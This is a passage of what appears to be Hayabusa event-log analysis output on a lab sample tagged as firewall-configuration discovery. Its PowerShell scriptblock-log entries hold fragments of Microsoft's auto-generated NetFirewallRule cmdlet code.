[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Pa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 
'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyS",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( 
[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, 
